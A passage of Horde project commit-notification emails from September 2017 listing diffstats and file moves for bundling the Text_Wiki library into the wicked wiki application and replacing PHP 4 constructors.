 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/Emphasis.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/Freelink2.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/Heading2.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/Horiz.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/Interwiki.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/Italic.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/Links.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/List.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/Newline.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/Paragraph.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/Phplookup.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/Raw.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/Revise.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/Strong.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/Subscript.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/Superscript.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/Table2.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/Toc2.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/Tt.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/Underline.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/Url.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/Wikilink.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Xhtml/Attribute.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Xhtml/Code2.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Xhtml/Freelink2.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Xhtml/Heading2.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Xhtml/Image2.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Xhtml/Interwiki.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Xhtml/Registrylink.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Xhtml/Toc2.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Xhtml/Url.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Xhtml/Wickedblock.php
 delete mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Xhtml/Wikilink2.php

http://github.com/horde/horde/commit/d6e5e531c18748c30ecd959c8d3e700102754635

-----------------------------------------------------------------------

commit 2b7fa546469029009782bcab89c41c9c108f2da6
Author: Jan Schneider 
Date:   Mon Sep 4 18:57:51 2017 +0200

    Remove PHP 4 constructors.

 Text/Wiki.php                          |  20 ----
 Text/Wiki/BBCode.php                   |   4 +-
 Text/Wiki/Cowiki.php                   |   4 +-
 Text/Wiki/Creole.php                   |   6 +-
 Text/Wiki/Doku.php                     |   4 +-
 Text/Wiki/Mediawiki.php                |   4 +-
 Text/Wiki/Parse.php                    |  16 ---
 Text/Wiki/Parse/BBCode/Image.php       |   4 +-
 Text/Wiki/Parse/BBCode/Url.php         |   4 +-
 Text/Wiki/Parse/Cowiki/Delimiter.php   |  56 ++++-----
 Text/Wiki/Parse/Cowiki/Emphasis.php    |  50 ++++----
 Text/Wiki/Parse/Cowiki/Italic.php      |  46 ++++----
 Text/Wiki/Parse/Cowiki/Url.php         | 190 +++++++++++++++----------------
 Text/Wiki/Parse/Cowiki/Wikilink.php    |  98 ++++++++--------
 Text/Wiki/Parse/Creole/Delimiter.php   |   6 +-
 Text/Wiki/Parse/Creole/Image.php       |   6 +-
 Text/Wiki/Parse/Creole/Url.php         |   6 +-
 Text/Wiki/Parse/Creole/Wikilink.php    |   6 +-
 Text/Wiki/Parse/Default/Delimiter.php  |  17 ---
 Text/Wiki/Parse/Default/Freelink.php   |  16 ---
 Text/Wiki/Parse/Default/Image.php      |  13 ---
 Text/Wiki/Parse/Default/Smiley.php     |  13 ---
 Text/Wiki/Parse/Default/Url.php        |  15 ---
 Text/Wiki/Parse/Default/Wikilink.php   |  19 ----
 Text/Wiki/Parse/Doku/Delimiter.php     |  56 ++++-----
 Text/Wiki/Parse/Doku/Url.php           | 202 ++++++++++++++++-----------------
 Text/Wiki/Parse/Mediawiki/Url.php      | 122 ++++++++++----------
 Text/Wiki/Parse/Mediawiki/Wikilink.php |  12 +-
 Text/Wiki/Parse/Tiki/Delimiter.php     |  56 ++++-----
 Text/Wiki/Parse/Tiki/Freelink.php      |  70 ++++++------
 Text/Wiki/Parse/Tiki/Specialchar.php   |   4 +-
 Text/Wiki/Parse/Tiki/Url.php           | 192 +++++++++++++++----------------
 Text/Wiki/Parse/Tiki/Wikilink.php      |  98 ++++++++--------
 Text/Wiki/Render.php                   |  16 ---
 Text/Wiki/Render/Docbook/Heading.php   |  22 +---
 Text/Wiki/Tiki.php                     |   4 +-
 36 files changed, 658 insertions(+), 819 deletions(-)

http://github.com/horde/horde/commit/2b7fa546469029009782bcab89c41c9c108f2da6

-----------------------------------------------------------------------

commit 85b8bafc17673df8a60be1a27384a9a6a75ba826
Merge: d6e5e53 2b7fa54
Author: Jan Schneider 
Date:   Wed Sep 6 10:00:00 2017 +0200

    Merge commit '2b7fa546469029009782bcab89c41c9c108f2da6'

 wicked/lib/Text_Wiki/Text/Wiki.php                 |  20 --
 wicked/lib/Text_Wiki/Text/Wiki/BBCode.php          |   4 +-
 wicked/lib/Text_Wiki/Text/Wiki/Cowiki.php          |   4 +-
 wicked/lib/Text_Wiki/Text/Wiki/Creole.php          |   6 +-
 wicked/lib/Text_Wiki/Text/Wiki/Doku.php            |   4 +-
 wicked/lib/Text_Wiki/Text/Wiki/Mediawiki.php       |   4 +-
 wicked/lib/Text_Wiki/Text/Wiki/Parse.php           |  16 --
 .../lib/Text_Wiki/Text/Wiki/Parse/BBCode/Image.php |   4 +-
 .../lib/Text_Wiki/Text/Wiki/Parse/BBCode/Url.php   |   4 +-
 .../Text_Wiki/Text/Wiki/Parse/Cowiki/Delimiter.php |  56 +++---
 .../Text_Wiki/Text/Wiki/Parse/Cowiki/Emphasis.php  |  50 ++---
 .../Text_Wiki/Text/Wiki/Parse/Cowiki/Italic.php    |  46 ++---
 .../lib/Text_Wiki/Text/Wiki/Parse/Cowiki/Url.php   | 190 +++++++++----------
 .../Text_Wiki/Text/Wiki/Parse/Cowiki/Wikilink.php  |  98 +++++-----
 .../Text_Wiki/Text/Wiki/Parse/Creole/Delimiter.php |   6 +-
 .../lib/Text_Wiki/Text/Wiki/Parse/Creole/Image.php |   6 +-
 .../lib/Text_Wiki/Text/Wiki/Parse/Creole/Url.php   |   6 +-
 .../Text_Wiki/Text/Wiki/Parse/Creole/Wikilink.php  |   6 +-
 .../Text/Wiki/Parse/Default/Delimiter.php          |  17 --
 .../Text_Wiki/Text/Wiki/Parse/Default/Freelink.php |  16 --
 .../Text_Wiki/Text/Wiki/Parse/Default/Image.php    |  13 --
 .../Text_Wiki/Text/Wiki/Parse/Default/Smiley.php   |  13 --
 .../lib/Text_Wiki/Text/Wiki/Parse/Default/Url.php  |  15 --
 .../Text_Wiki/Text/Wiki/Parse/Default/Wikilink.php |  19 --
 .../Text_Wiki/Text/Wiki/Parse/Doku/Delimiter.php   |  56 +++---
 wicked/lib/Text_Wiki/Text/Wiki/Parse/Doku/Url.php  | 204 ++++++++++-----------
 .../Text_Wiki/Text/Wiki/Parse/Mediawiki/Url.php    | 122 ++++++------
 .../Text/Wiki/Parse/Mediawiki/Wikilink.php         |  12 +-
 .../Text_Wiki/Text/Wiki/Parse/Tiki/Delimiter.php   |  56 +++---
 .../Text_Wiki/Text/Wiki/Parse/Tiki/Freelink.php    |  70 +++----
 .../Text_Wiki/Text/Wiki/Parse/Tiki/Specialchar.php |   4 +-
 wicked/lib/Text_Wiki/Text/Wiki/Parse/Tiki/Url.php  | 188 +++++++++----------
 .../Text_Wiki/Text/Wiki/Parse/Tiki/Wikilink.php    |  98 +++++-----
 wicked/lib/Text_Wiki/Text/Wiki/Render.php          |  16 --
 .../Text_Wiki/Text/Wiki/Render/Docbook/Heading.php |  22 +--
 .../Text_Wiki/Text/Wiki/Render/Xhtml/Interwiki.php | 115 ++++++++----
 .../lib/Text_Wiki/Text/Wiki/Render/Xhtml/Url.php   | 138 +++++++++++---
 wicked/lib/Text_Wiki/Text/Wiki/Tiki.php            |   4 +-
 38 files changed, 841 insertions(+), 887 deletions(-)

http://github.com/horde/horde/commit/85b8bafc17673df8a60be1a27384a9a6a75ba826

-----------------------------------------------------------------------

commit a103e17a07ea48679344e808e645b91ea1b52c8a
Author: Jan Schneider 
Date:   Wed Sep 6 10:07:23 2017 +0200

    Use PHP 5 constructors in our own parsers too.

 wicked/lib/Text_Wiki/Text/Wiki/Parse/BBCode/Attribute.php    | 2 +-
 wicked/lib/Text_Wiki/Text/Wiki/Parse/Cowiki/Attribute.php    | 2 +-
 wicked/lib/Text_Wiki/Text/Wiki/Parse/Creole/Attribute.php    | 2 +-
 wicked/lib/Text_Wiki/Text/Wiki/Parse/Default/Attribute.php   | 2 +-
 wicked/lib/Text_Wiki/Text/Wiki/Parse/Mediawiki/Attribute.php | 2 +-
 wicked/lib/Text_Wiki/Text/Wiki/Parse/Tiki/Attribute.php      | 2 +-
 6 files changed, 6 insertions(+), 6 deletions(-)

http://github.com/horde/horde/commit/a103e17a07ea48679344e808e645b91ea1b52c8a

-----------------------------------------------------------------------

commit 7a28549a5302eaf1ec4a187444e8446b0a73537a
Author: Jan Schneider 
Date:   Wed Sep 6 10:08:23 2017 +0200

    Load the bundled Text_Wiki.

 wicked/lib/Application.php | 17 +++++++++++++++++
 wicked/lib/Page.php        | 14 --------------
 2 files changed, 17 insertions(+), 14 deletions(-)

http://github.com/horde/horde/commit/7a28549a5302eaf1ec4a187444e8446b0a73537a

-----------------------------------------------------------------------

commit 3c1556861e7cb7f86429a1807940b89d8cf0bdfb
Author: Jan Schneider 
Date:   Wed Sep 6 10:13:01 2017 +0200

    Removed too much.

 wicked/lib/Text_Wiki/Text/Wiki/Parse/Tiki/Url.php | 16 ++++++++++++++++
 1 file changed, 16 insertions(+)

http://github.com/horde/horde/commit/3c1556861e7cb7f86429a1807940b89d8cf0bdfb



From jan at horde.org  Wed Sep  6 09:09:55 2017
From: jan at horde.org (Jan Schneider)
Date: Wed,  6 Sep 2017 11:09:55 +0200 (CEST)
Subject: [commits] Horde branch FRAMEWORK_5_2 updated.
	d0e34d92025796ebb0de193d2a82a61fc88c0190
Message-ID: <20170906090959.ED276100BF1@spencer.horde.org>

The branch "FRAMEWORK_5_2" has been updated.
The following is a summary of the commits.

from: adfdaeb54395a2daa615ed1f451d63a11fb3f3b5

4a6e486 Prepare for adding a subtree.
1ef5c58 Squashed 'wicked/lib/Text_Wiki/' content from commit 2b7fa54
1000411 Merge commit '1ef5c58c4803938f47cd76d72536248f6f2b6d91' as 'wicked/lib/Text_Wiki'
f8bbefd Re-merge Horde customizations and extensions.
37ffba5 Use PHP 5 constructors in our own parsers too.
b3958ba Load the bundled Text_Wiki.
5a94b41 [jan] Bundle Text_Wiki and fix it to run on PHP 7.
1321c0e Remove Text_Wiki dependency.
d0e34d9 Update file list.

Summary: http://github.com/horde/horde/compare/adfdaeb54395a2daa615ed1f451d63a11fb3f3b5...d0e34d92025796ebb0de193d2a82a61fc88c0190

-----------------------------------------------------------------------

commit 4a6e4863be64bd2d807a49ae2b8e495f1b36cbc9
Author: Jan Schneider 
Date:   Mon Sep 4 17:39:47 2017 +0200

    Prepare for adding a subtree.

 wicked/lib/Text_Wiki/Parse/BBCode/Attribute.php    |  52 -------
 wicked/lib/Text_Wiki/Parse/BBCode/Code2.php        |  10 --
 wicked/lib/Text_Wiki/Parse/BBCode/Image2.php       |  10 --
 wicked/lib/Text_Wiki/Parse/BBCode/Registrylink.php |  44 ------
 wicked/lib/Text_Wiki/Parse/BBCode/Wickedblock.php  |  45 ------
 wicked/lib/Text_Wiki/Parse/Cowiki/Attribute.php    |  52 -------
 wicked/lib/Text_Wiki/Parse/Cowiki/Code2.php        |  10 --
 wicked/lib/Text_Wiki/Parse/Cowiki/Freelink2.php    |  10 --
 wicked/lib/Text_Wiki/Parse/Cowiki/Heading2.php     |  15 --
 wicked/lib/Text_Wiki/Parse/Cowiki/Image2.php       |  10 --
 wicked/lib/Text_Wiki/Parse/Cowiki/Registrylink.php |  44 ------
 wicked/lib/Text_Wiki/Parse/Cowiki/Wickedblock.php  |  45 ------
 wicked/lib/Text_Wiki/Parse/Cowiki/Wikilink2.php    |  10 --
 wicked/lib/Text_Wiki/Parse/Creole/Attribute.php    |  52 -------
 wicked/lib/Text_Wiki/Parse/Creole/Heading2.php     |  12 --
 wicked/lib/Text_Wiki/Parse/Creole/Image2.php       |  10 --
 wicked/lib/Text_Wiki/Parse/Creole/Registrylink.php |  44 ------
 wicked/lib/Text_Wiki/Parse/Creole/Wickedblock.php  |  45 ------
 wicked/lib/Text_Wiki/Parse/Creole/Wikilink2.php    |  10 --
 wicked/lib/Text_Wiki/Parse/Default/Attribute.php   |  52 -------
 wicked/lib/Text_Wiki/Parse/Default/Code2.php       |  13 --
 wicked/lib/Text_Wiki/Parse/Default/Freelink2.php   |  10 --
 wicked/lib/Text_Wiki/Parse/Default/Heading2.php    |  16 ---
 wicked/lib/Text_Wiki/Parse/Default/Image2.php      |  10 --
 .../lib/Text_Wiki/Parse/Default/Registrylink.php   |  44 ------
 wicked/lib/Text_Wiki/Parse/Default/Toc2.php        |  86 -----------
 wicked/lib/Text_Wiki/Parse/Default/Wickedblock.php |  45 ------
 wicked/lib/Text_Wiki/Parse/Default/Wikilink2.php   |  10 --
 wicked/lib/Text_Wiki/Parse/Mediawiki/Attribute.php |  52 -------
 wicked/lib/Text_Wiki/Parse/Mediawiki/Code2.php     |  10 --
 wicked/lib/Text_Wiki/Parse/Mediawiki/Heading2.php  |  12 --
 wicked/lib/Text_Wiki/Parse/Mediawiki/Image2.php    |  10 --
 .../lib/Text_Wiki/Parse/Mediawiki/Registrylink.php |  44 ------
 .../lib/Text_Wiki/Parse/Mediawiki/Wickedblock.php  |  45 ------
 wicked/lib/Text_Wiki/Parse/Mediawiki/Wikilink2.php |  63 ---------
 wicked/lib/Text_Wiki/Parse/Tiki/Attribute.php      |  52 -------
 wicked/lib/Text_Wiki/Parse/Tiki/Code2.php          |  10 --
 wicked/lib/Text_Wiki/Parse/Tiki/Freelink2.php      |  10 --
 wicked/lib/Text_Wiki/Parse/Tiki/Heading2.php       |  12 --
 wicked/lib/Text_Wiki/Parse/Tiki/Image2.php         |  10 --
 wicked/lib/Text_Wiki/Parse/Tiki/Registrylink.php   |  44 ------
 wicked/lib/Text_Wiki/Parse/Tiki/Wickedblock.php    |  45 ------
 wicked/lib/Text_Wiki/Parse/Tiki/Wikilink2.php      |  10 --
 wicked/lib/Text_Wiki/Render/Latex/Heading2.php     |   7 -
 wicked/lib/Text_Wiki/Render/Latex/Toc2.php         |   7 -
 wicked/lib/Text_Wiki/Render/Plain/Heading2.php     |   7 -
 wicked/lib/Text_Wiki/Render/Plain/Toc2.php         |   7 -
 wicked/lib/Text_Wiki/Render/Rst.php                |  39 -----
 wicked/lib/Text_Wiki/Render/Rst/Blockquote.php     |  59 --------
 wicked/lib/Text_Wiki/Render/Rst/Bold.php           |  49 -------
 wicked/lib/Text_Wiki/Render/Rst/Code.php           |  43 ------
 wicked/lib/Text_Wiki/Render/Rst/Deflist.php        |  87 ------------
 wicked/lib/Text_Wiki/Render/Rst/Emphasis.php       |  46 ------
 wicked/lib/Text_Wiki/Render/Rst/Freelink.php       |  53 -------
 wicked/lib/Text_Wiki/Render/Rst/Heading2.php       | 103 --------------
 wicked/lib/Text_Wiki/Render/Rst/Horiz.php          |  39 -----
 wicked/lib/Text_Wiki/Render/Rst/Links.php          |  48 -------
 wicked/lib/Text_Wiki/Render/Rst/List.php           |  65 ---------
 wicked/lib/Text_Wiki/Render/Rst/Newline.php        |  43 ------
 wicked/lib/Text_Wiki/Render/Rst/Paragraph.php      |  52 -------
 wicked/lib/Text_Wiki/Render/Rst/Raw.php            |  43 ------
 wicked/lib/Text_Wiki/Render/Rst/Toc2.php           |  57 --------
 wicked/lib/Text_Wiki/Render/Rst/Tt.php             |  43 ------
 wicked/lib/Text_Wiki/Render/Rst/Url.php            |  58 --------
 wicked/lib/Text_Wiki/Render/Xhtml/Attribute.php    |  53 -------
 wicked/lib/Text_Wiki/Render/Xhtml/Code2.php        |  28 ----
 wicked/lib/Text_Wiki/Render/Xhtml/Freelink2.php    |   5 -
 wicked/lib/Text_Wiki/Render/Xhtml/Heading2.php     |   7 -
 wicked/lib/Text_Wiki/Render/Xhtml/Image2.php       | 157 ---------------------
 wicked/lib/Text_Wiki/Render/Xhtml/Interwiki.php    |  56 --------
 wicked/lib/Text_Wiki/Render/Xhtml/Registrylink.php |  29 ----
 wicked/lib/Text_Wiki/Render/Xhtml/Toc2.php         |  92 ------------
 wicked/lib/Text_Wiki/Render/Xhtml/Url.php          |  47 ------
 wicked/lib/Text_Wiki/Render/Xhtml/Wickedblock.php  |  33 -----
 wicked/lib/Text_Wiki/Render/Xhtml/Wikilink2.php    | 110 ---------------
 .../Parse/BBCode/Attribute.php                     |  52 +++++++
 .../Text_Wiki_Extensions/Parse/BBCode/Code2.php    |  10 ++
 .../Text_Wiki_Extensions/Parse/BBCode/Image2.php   |  10 ++
 .../Parse/BBCode/Registrylink.php                  |  44 ++++++
 .../Parse/BBCode/Wickedblock.php                   |  45 ++++++
 .../Parse/Cowiki/Attribute.php                     |  52 +++++++
 .../Text_Wiki_Extensions/Parse/Cowiki/Code2.php    |  10 ++
 .../Parse/Cowiki/Freelink2.php                     |  10 ++
 .../Text_Wiki_Extensions/Parse/Cowiki/Heading2.php |  15 ++
 .../Text_Wiki_Extensions/Parse/Cowiki/Image2.php   |  10 ++
 .../Parse/Cowiki/Registrylink.php                  |  44 ++++++
 .../Parse/Cowiki/Wickedblock.php                   |  45 ++++++
 .../Parse/Cowiki/Wikilink2.php                     |  10 ++
 .../Parse/Creole/Attribute.php                     |  52 +++++++
 .../Text_Wiki_Extensions/Parse/Creole/Heading2.php |  12 ++
 .../Text_Wiki_Extensions/Parse/Creole/Image2.php   |  10 ++
 .../Parse/Creole/Registrylink.php                  |  44 ++++++
 .../Parse/Creole/Wickedblock.php                   |  45 ++++++
 .../Parse/Creole/Wikilink2.php                     |  10 ++
 .../Parse/Default/Attribute.php                    |  52 +++++++
 .../Text_Wiki_Extensions/Parse/Default/Code2.php   |  13 ++
 .../Parse/Default/Freelink2.php                    |  10 ++
 .../Parse/Default/Heading2.php                     |  16 +++
 .../Text_Wiki_Extensions/Parse/Default/Image2.php  |  10 ++
 .../Parse/Default/Registrylink.php                 |  44 ++++++
 .../Text_Wiki_Extensions/Parse/Default/Toc2.php    |  86 +++++++++++
 .../Parse/Default/Wickedblock.php                  |  45 ++++++
 .../Parse/Default/Wikilink2.php                    |  10 ++
 .../Parse/Mediawiki/Attribute.php                  |  52 +++++++
 .../Text_Wiki_Extensions/Parse/Mediawiki/Code2.php |  10 ++
 .../Parse/Mediawiki/Heading2.php                   |  12 ++
 .../Parse/Mediawiki/Image2.php                     |  10 ++
 .../Parse/Mediawiki/Registrylink.php               |  44 ++++++
 .../Parse/Mediawiki/Wickedblock.php                |  45 ++++++
 .../Parse/Mediawiki/Wikilink2.php                  |  63 +++++++++
 .../Text_Wiki_Extensions/Parse/Tiki/Attribute.php  |  52 +++++++
 .../lib/Text_Wiki_Extensions/Parse/Tiki/Code2.php  |  10 ++
 .../Text_Wiki_Extensions/Parse/Tiki/Freelink2.php  |  10 ++
 .../Text_Wiki_Extensions/Parse/Tiki/Heading2.php   |  12 ++
 .../lib/Text_Wiki_Extensions/Parse/Tiki/Image2.php |  10 ++
 .../Parse/Tiki/Registrylink.php                    |  44 ++++++
 .../Parse/Tiki/Wickedblock.php                     |  45 ++++++
 .../Text_Wiki_Extensions/Parse/Tiki/Wikilink2.php  |  10 ++
 .../Text_Wiki_Extensions/Render/Latex/Heading2.php |   7 +
 .../lib/Text_Wiki_Extensions/Render/Latex/Toc2.php |   7 +
 .../Text_Wiki_Extensions/Render/Plain/Heading2.php |   7 +
 .../lib/Text_Wiki_Extensions/Render/Plain/Toc2.php |   7 +
 wicked/lib/Text_Wiki_Extensions/Render/Rst.php     |  39 +++++
 .../Text_Wiki_Extensions/Render/Rst/Blockquote.php |  59 ++++++++
 .../lib/Text_Wiki_Extensions/Render/Rst/Bold.php   |  49 +++++++
 .../lib/Text_Wiki_Extensions/Render/Rst/Code.php   |  43 ++++++
 .../Text_Wiki_Extensions/Render/Rst/Deflist.php    |  87 ++++++++++++
 .../Text_Wiki_Extensions/Render/Rst/Emphasis.php   |  46 ++++++
 .../Text_Wiki_Extensions/Render/Rst/Freelink.php   |  53 +++++++
 .../Text_Wiki_Extensions/Render/Rst/Heading2.php   | 103 ++++++++++++++
 .../lib/Text_Wiki_Extensions/Render/Rst/Horiz.php  |  39 +++++
 .../lib/Text_Wiki_Extensions/Render/Rst/Links.php  |  48 +++++++
 .../lib/Text_Wiki_Extensions/Render/Rst/List.php   |  65 +++++++++
 .../Text_Wiki_Extensions/Render/Rst/Newline.php    |  43 ++++++
 .../Text_Wiki_Extensions/Render/Rst/Paragraph.php  |  52 +++++++
 wicked/lib/Text_Wiki_Extensions/Render/Rst/Raw.php |  43 ++++++
 .../lib/Text_Wiki_Extensions/Render/Rst/Toc2.php   |  57 ++++++++
 wicked/lib/Text_Wiki_Extensions/Render/Rst/Tt.php  |  43 ++++++
 wicked/lib/Text_Wiki_Extensions/Render/Rst/Url.php |  58 ++++++++
 .../Render/Xhtml/Attribute.php                     |  53 +++++++
 .../Text_Wiki_Extensions/Render/Xhtml/Code2.php    |  28 ++++
 .../Render/Xhtml/Freelink2.php                     |   5 +
 .../Text_Wiki_Extensions/Render/Xhtml/Heading2.php |   7 +
 .../Text_Wiki_Extensions/Render/Xhtml/Image2.php   | 157 +++++++++++++++++++++
 .../Render/Xhtml/Interwiki.php                     |  56 ++++++++
 .../Render/Xhtml/Registrylink.php                  |  29 ++++
 .../lib/Text_Wiki_Extensions/Render/Xhtml/Toc2.php |  92 ++++++++++++
 .../lib/Text_Wiki_Extensions/Render/Xhtml/Url.php  |  47 ++++++
 .../Render/Xhtml/Wickedblock.php                   |  33 +++++
 .../Render/Xhtml/Wikilink2.php                     | 110 +++++++++++++++
 150 files changed, 2817 insertions(+), 2817 deletions(-)
 delete mode 100644 wicked/lib/Text_Wiki/Parse/BBCode/Attribute.php
 delete mode 100644 wicked/lib/Text_Wiki/Parse/BBCode/Code2.php
 delete mode 100644 wicked/lib/Text_Wiki/Parse/BBCode/Image2.php
 delete mode 100644 wicked/lib/Text_Wiki/Parse/BBCode/Registrylink.php
 delete mode 100644 wicked/lib/Text_Wiki/Parse/BBCode/Wickedblock.php
 delete mode 100644 wicked/lib/Text_Wiki/Parse/Cowiki/Attribute.php
 delete mode 100644 wicked/lib/Text_Wiki/Parse/Cowiki/Code2.php
 delete mode 100644 wicked/lib/Text_Wiki/Parse/Cowiki/Freelink2.php
 delete mode 100644 wicked/lib/Text_Wiki/Parse/Cowiki/Heading2.php
 delete mode 100644 wicked/lib/Text_Wiki/Parse/Cowiki/Image2.php
 delete mode 100644 wicked/lib/Text_Wiki/Parse/Cowiki/Registrylink.php
 delete mode 100644 wicked/lib/Text_Wiki/Parse/Cowiki/Wickedblock.php
 delete mode 100644 wicked/lib/Text_Wiki/Parse/Cowiki/Wikilink2.php
 delete mode 100644 wicked/lib/Text_Wiki/Parse/Creole/Attribute.php
 delete mode 100644 wicked/lib/Text_Wiki/Parse/Creole/Heading2.php
 delete mode 100644 wicked/lib/Text_Wiki/Parse/Creole/Image2.php
 delete mode 100644 wicked/lib/Text_Wiki/Parse/Creole/Registrylink.php
 delete mode 100644 wicked/lib/Text_Wiki/Parse/Creole/Wickedblock.php
 delete mode 100644 wicked/lib/Text_Wiki/Parse/Creole/Wikilink2.php
 delete mode 100644 wicked/lib/Text_Wiki/Parse/Default/Attribute.php
 delete mode 100644 wicked/lib/Text_Wiki/Parse/Default/Code2.php
 delete mode 100644 wicked/lib/Text_Wiki/Parse/Default/Freelink2.php
 delete mode 100644 wicked/lib/Text_Wiki/Parse/Default/Heading2.php
 delete mode 100644 wicked/lib/Text_Wiki/Parse/Default/Image2.php
 delete mode 100644 wicked/lib/Text_Wiki/Parse/Default/Registrylink.php
 delete mode 100644 wicked/lib/Text_Wiki/Parse/Default/Toc2.php
 delete mode 100644 wicked/lib/Text_Wiki/Parse/Default/Wickedblock.php
 delete mode 100644 wicked/lib/Text_Wiki/Parse/Default/Wikilink2.php
 delete mode 100644 wicked/lib/Text_Wiki/Parse/Mediawiki/Attribute.php
 delete mode 100644 wicked/lib/Text_Wiki/Parse/Mediawiki/Code2.php
 delete mode 100644 wicked/lib/Text_Wiki/Parse/Mediawiki/Heading2.php
 delete mode 100644 wicked/lib/Text_Wiki/Parse/Mediawiki/Image2.php
 delete mode 100644 wicked/lib/Text_Wiki/Parse/Mediawiki/Registrylink.php
 delete mode 100644 wicked/lib/Text_Wiki/Parse/Mediawiki/Wickedblock.php
 delete mode 100644 wicked/lib/Text_Wiki/Parse/Mediawiki/Wikilink2.php
 delete mode 100644 wicked/lib/Text_Wiki/Parse/Tiki/Attribute.php
 delete mode 100644 wicked/lib/Text_Wiki/Parse/Tiki/Code2.php
 delete mode 100644 wicked/lib/Text_Wiki/Parse/Tiki/Freelink2.php
 delete mode 100644 wicked/lib/Text_Wiki/Parse/Tiki/Heading2.php
 delete mode 100644 wicked/lib/Text_Wiki/Parse/Tiki/Image2.php
 delete mode 100644 wicked/lib/Text_Wiki/Parse/Tiki/Registrylink.php
 delete mode 100644 wicked/lib/Text_Wiki/Parse/Tiki/Wickedblock.php
 delete mode 100644 wicked/lib/Text_Wiki/Parse/Tiki/Wikilink2.php
 delete mode 100644 wicked/lib/Text_Wiki/Render/Latex/Heading2.php
 delete mode 100644 wicked/lib/Text_Wiki/Render/Latex/Toc2.php
 delete mode 100644 wicked/lib/Text_Wiki/Render/Plain/Heading2.php
 delete mode 100644 wicked/lib/Text_Wiki/Render/Plain/Toc2.php
 delete mode 100644 wicked/lib/Text_Wiki/Render/Rst.php
 delete mode 100644 wicked/lib/Text_Wiki/Render/Rst/Blockquote.php
 delete mode 100644 wicked/lib/Text_Wiki/Render/Rst/Bold.php
 delete mode 100644 wicked/lib/Text_Wiki/Render/Rst/Code.php
 delete mode 100644 wicked/lib/Text_Wiki/Render/Rst/Deflist.php
 delete mode 100644 wicked/lib/Text_Wiki/Render/Rst/Emphasis.php
 delete mode 100644 wicked/lib/Text_Wiki/Render/Rst/Freelink.php
 delete mode 100644 wicked/lib/Text_Wiki/Render/Rst/Heading2.php
 delete mode 100644 wicked/lib/Text_Wiki/Render/Rst/Horiz.php
 delete mode 100644 wicked/lib/Text_Wiki/Render/Rst/Links.php
 delete mode 100644 wicked/lib/Text_Wiki/Render/Rst/List.php
 delete mode 100644 wicked/lib/Text_Wiki/Render/Rst/Newline.php
 delete mode 100644 wicked/lib/Text_Wiki/Render/Rst/Paragraph.php
 delete mode 100644 wicked/lib/Text_Wiki/Render/Rst/Raw.php
 delete mode 100644 wicked/lib/Text_Wiki/Render/Rst/Toc2.php
 delete mode 100644 wicked/lib/Text_Wiki/Render/Rst/Tt.php
 delete mode 100644 wicked/lib/Text_Wiki/Render/Rst/Url.php
 delete mode 100644 wicked/lib/Text_Wiki/Render/Xhtml/Attribute.php
 delete mode 100644 wicked/lib/Text_Wiki/Render/Xhtml/Code2.php
 delete mode 100644 wicked/lib/Text_Wiki/Render/Xhtml/Freelink2.php
 delete mode 100644 wicked/lib/Text_Wiki/Render/Xhtml/Heading2.php
 delete mode 100644 wicked/lib/Text_Wiki/Render/Xhtml/Image2.php
 delete mode 100644 wicked/lib/Text_Wiki/Render/Xhtml/Interwiki.php
 delete mode 100644 wicked/lib/Text_Wiki/Render/Xhtml/Registrylink.php
 delete mode 100644 wicked/lib/Text_Wiki/Render/Xhtml/Toc2.php
 delete mode 100644 wicked/lib/Text_Wiki/Render/Xhtml/Url.php
 delete mode 100644 wicked/lib/Text_Wiki/Render/Xhtml/Wickedblock.php
 delete mode 100644 wicked/lib/Text_Wiki/Render/Xhtml/Wikilink2.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/BBCode/Attribute.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/BBCode/Code2.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/BBCode/Image2.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/BBCode/Registrylink.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/BBCode/Wickedblock.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Cowiki/Attribute.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Cowiki/Code2.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Cowiki/Freelink2.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Cowiki/Heading2.php
